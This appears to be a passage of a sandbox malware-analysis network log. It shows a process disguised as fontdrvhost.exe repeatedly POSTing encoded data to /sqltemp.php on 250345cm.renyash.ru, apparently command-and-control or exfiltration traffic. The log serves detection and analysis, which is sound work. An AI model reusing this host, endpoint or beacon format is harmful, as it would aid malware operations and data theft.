Jan 1, 2025 14:53:16.229343891 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FXu8ZqCShlfdtlEJwnELDsZVGMZ7jz7HWwXD3sIRkH2mMMXvrGlNGi33ZCXmhrnqpthjBB9iFH4ZgLge%2FETQj2H7e%2BdAVQcmnLwPhrWHld77YWYOgkkpjfl9Ysg24V28nziqXe0H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe9b0f210f7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3839&min_rtt=1514&rtt_var=5217&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=72586&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49983	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:16.352289915 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:16.699131012 CET	1012	OUT	Data Raw: 53 55 5f 50 51 5f 54 57 58 56 52 59 56 50 59 57 5b 53 54 5d 55 5b 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SU_PQ_TWXVRYVPYW[ST]U[P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$)#?"$(,9%U =<<4)-4 !/*;.1<7T:&Y.,Y-
Jan 1, 2025 14:53:16.804708004 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49988	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:16.924282074 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:17.277270079 CET	1852	OUT	Data Raw: 53 52 5f 5c 51 5a 54 52 58 56 52 59 56 5a 59 54 5b 5c 54 51 55 5b 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SR_\QZTRXVRYVZYT[\TQU[PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$/= ?%^0.4;)%R7=;(+>8#?X*;%??U.&Y.,Y--
Jan 1, 2025 14:53:17.378056049 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:17.640228033 CET	950	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYQiLeh4ohlrOliXV7ulvY8%2B3pJBP%2FUq14fDOC5foYwdH01ltTzR1q%2Fp1Kfgmkf8Y2k0Ixj8TBp9YZHVoAsu0TpnwPTHBrDPVC2%2Bogk0zWsoFChyREJrVRkhnbMyoxJw3Fvn8wfU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fea35a26de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3843&min_rtt=1476&rtt_var=5287&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=71526&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 57 28 2d 0c 55 24 31 2f 05 2b 03 3f 1f 25 3e 2a 5d 29 28 2a 1a 30 10 2c 00 2a 29 01 1e 35 2f 21 5e 31 38 0e 59 20 13 09 13 33 1e 2b 59 05 1c 23 18 35 01 34 59 2a 3e 37 5d 26 3f 3d 59 24 00 3c 5f 3f 28 30 55 37 28 24 00 33 2e 3b 03 28 29 37 0c 24 02 3c 02 3a 01 3e 0e 24 10 2c 54 00 11 26 1d 24 22 34 1b 20 37 27 00 36 31 31 5f 25 42 2e 53 26 02 20 0a 34 07 32 15 31 31 27 5b 21 33 08 5a 31 15 3d 5a 23 2d 34 09 29 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a Data Ascii: 98%W(-U$1/+?%>])(0,)5/!^18Y 3+Y#54Y>7]&?=Y$<_?(0U7($3.;()7$<:>$,T&$"4 7'611_%B.S& 4211'[!3Z1=Z#-4)>%S -H?WS
Jan 1, 2025 14:53:17.728766918 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49989	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:17.042898893 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:17.402266026 CET	1012	OUT	Data Raw: 53 57 5a 53 51 5b 54 54 58 56 52 59 56 51 59 53 5b 5a 54 58 55 58 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SWZSQ[TTXVRYVQYS[ZTXUXP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3,!Z#?!0#E,\%U7 ^+:<([ T/[(%$,:&Y.,Y-
Jan 1, 2025 14:53:17.486720085 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:17.758821011 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rgh6eypzDDzBa8MLJQCD76qq%2BFZg%2B5fBH9z5Y3DcO0viZ%2FpIjJhMFyXh5GMUhJ6UaDCiwWy43zmelJn4rv5%2BkMATrZYvBEUJzfb3XtjVcshWOsT%2BhqPafzcUxtc%2Bs9muP1c%2Bu1fc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fea40a5a422d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2576&min_rtt=1649&rtt_var=2473&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=160987&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49996	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:17.891175985 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:53:18.246124029 CET	1012	OUT	Data Raw: 56 5e 5a 57 51 5c 51 55 58 56 52 59 56 5e 59 56 5b 58 54 5b 55 58 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V^ZWQ\QUXVRYV^YV[XT[UXPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[$<57?';,\: [+*#)4Z7T+Z+(>&U:&Y.,Y-
Jan 1, 2025 14:53:18.353971004 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:18.618941069 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvqIAh9P%2BkH4dkWBQGgIBr17q7PHp%2BAhPWsgVGdoUhlYHgmGV%2BSzv0Lv1DVIlwSJJygj8Kt134%2Bjtw3p6rI5Ti09aJQwLPLu%2BbQ9fSHXbNzHp68DC%2FEUakGljL0VUviSKwSuZSPF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fea96a7c0f6d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3209&min_rtt=1526&rtt_var=3939&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=97378&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50002	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:18.744623899 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:19.089760065 CET	1012	OUT	Data Raw: 56 52 5f 53 51 5c 54 57 58 56 52 59 56 58 59 5e 5b 5d 54 5d 55 5e 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VR_SQ\TWXVRYVXY^[]T]U^PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[3 /Y$>,%S4-+)3*X$[#2X+(5E&U:&Y.,Y-%
Jan 1, 2025 14:53:19.197865009 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:19.462896109 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDrROniaIfYPLX2BmUIwqqR%2FMto325rfOXOeftB6cMyXwChwjbuiyiy9yF7AiLUI5MaFq3aZd4%2FL5o8Wtism%2FzkJ98io356f0s5yjLcW%2F3Ey%2BwiLpi4NOzEbf%2FASqe%2BDDeEClnnP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2feaeb9dc0f3a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3069&min_rtt=1611&rtt_var=3520&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=109972&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50009	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:19.591994047 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:19.949393034 CET	1012	OUT	Data Raw: 56 51 5f 53 51 5a 51 56 58 56 52 59 56 5b 59 54 5b 5e 54 5b 55 58 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_SQZQVXVRYV[YT[^T[UXPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y',=Y7<>%-?D,91V7=(3T(=47?+>1<#W::&Y.,Y-)
Jan 1, 2025 14:53:20.055293083 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:20.314991951 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aoeT7WAVTsBmiH2erAPyN8RLvCkWsUUjbXjRAsEkX0fGUkUm6gdjEqUTOd7%2BPq94fcWcKN%2FQB32lHwt%2BB0lQy58oHffCZlXurxQv3%2FH5D6mJ4IzAREySK3kz0WcvwaI9sHD9mGm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2feb4091142d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3532&min_rtt=1617&rtt_var=4438&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=86171&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50016	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:20.434406996 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:20.793019056 CET	1012	OUT	Data Raw: 56 5f 5a 50 54 5e 51 57 58 56 52 59 56 5d 59 57 5b 58 54 59 55 59 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V_ZPT^QWXVRYV]YW[XTYUYPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3,)4:0.?,:=#=?(./#(!&Y;T-&Y.,Y-1
Jan 1, 2025 14:53:20.883064032 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:21.065653086 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NH%2B95DnN8jkmwQoNTz%2FMkpgSmwBzuS9TS4zzGJb30xYnvGT1b4viPYOdxZbJ1VhleI1WkmSDWXra6ChIcZfmWFE1VQexqu%2Fx2IvsfsDf4cxcC%2B72Xt0DoFdeUdYWHid%2Fd3TL2DbJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2feb939397cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2128&min_rtt=1881&rtt_var=1201&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=377944&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50022	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:21.181802988 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:21.527460098 CET	1012	OUT	Data Raw: 56 54 5f 52 54 5b 51 50 58 56 52 59 56 5f 59 57 5b 5c 54 5d 55 54 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VT_RT[QPXVRYV_YW[\T]UTP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[$Y) /9]%=$,9-V4><_<#S*.72'\+;>%#9:&Y.,Y-9
Jan 1, 2025 14:53:21.631953955 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:21.802687883 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBe0aPOiK%2BxDXVTOYwhDeUiIPghgkiDF2j7%2FE%2FUkDQHt1IaLWSejTrkBdUaIKTY%2FI52XuY0R295h2ksHX8DIe9X%2FiEVz77PNePvGPP6wWGueZ4AkvEyk7W71XjByvH8%2FY8FvioBs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2febdeb9f0f97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3271&min_rtt=1654&rtt_var=3854&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=100068&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a Data Ascii: 42W\X
Jan 1, 2025 14:53:21.889344931 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50029	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:22.011080027 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:22.355564117 CET	1012	OUT	Data Raw: 56 53 5a 56 51 5c 54 51 58 56 52 59 56 5c 59 57 5b 53 54 58 55 5f 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VSZVQ\TQXVRYV\YW[STXU_P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'?="/33;:-S!-/+<<Z!2?Z8&%??:&Y.,Y-5
Jan 1, 2025 14:53:22.458761930 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:22.635010004 CET	812	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KoKX9nWtJJFnGjTBD0m%2FSO0%2FO9K2%2FXnCkE7a3w1Y4TK07ds7RkGzwM7O1eVc1ciVfSC7CtNXavO57hs8xWJ8J6csaOm%2FDkIT%2FwTCuKnseq75z%2FFPsWpfayXHtn%2FUoi0v6UVodUo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fec3194042d1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3605&min_rtt=1709&rtt_var=4434&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=86472&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50034	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:22.742400885 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50036	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:53:22.759742975 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:23.105408907 CET	1012	OUT	Data Raw: 56 54 5a 53 51 5b 51 52 58 56 52 59 56 58 59 5f 5b 5d 54 5a 55 5b 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VTZSQ[QRXVRYVXY_[]TZU[P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$/)Z7)$=(,:24-++:7>8Y4! (;>1/79:&Y.,Y-%
Jan 1, 2025 14:53:23.213421106 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:23.479727030 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGG7h0XpXCMcGbxd543lk7k71P9riLJbmb%2FvZ3NprbT0jWeoPuNlpCINxUwAIR%2FXdORo4JaufIITuh%2F8b7FiJiPdzXrnKgoZT%2FhlwXzWwaEcXPCO%2BLQtNBcwQkls3n3PI0NZOi3g"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fec7cebb4258-EWR alt-svc: h3=":443"; ma=86400 server-timing: 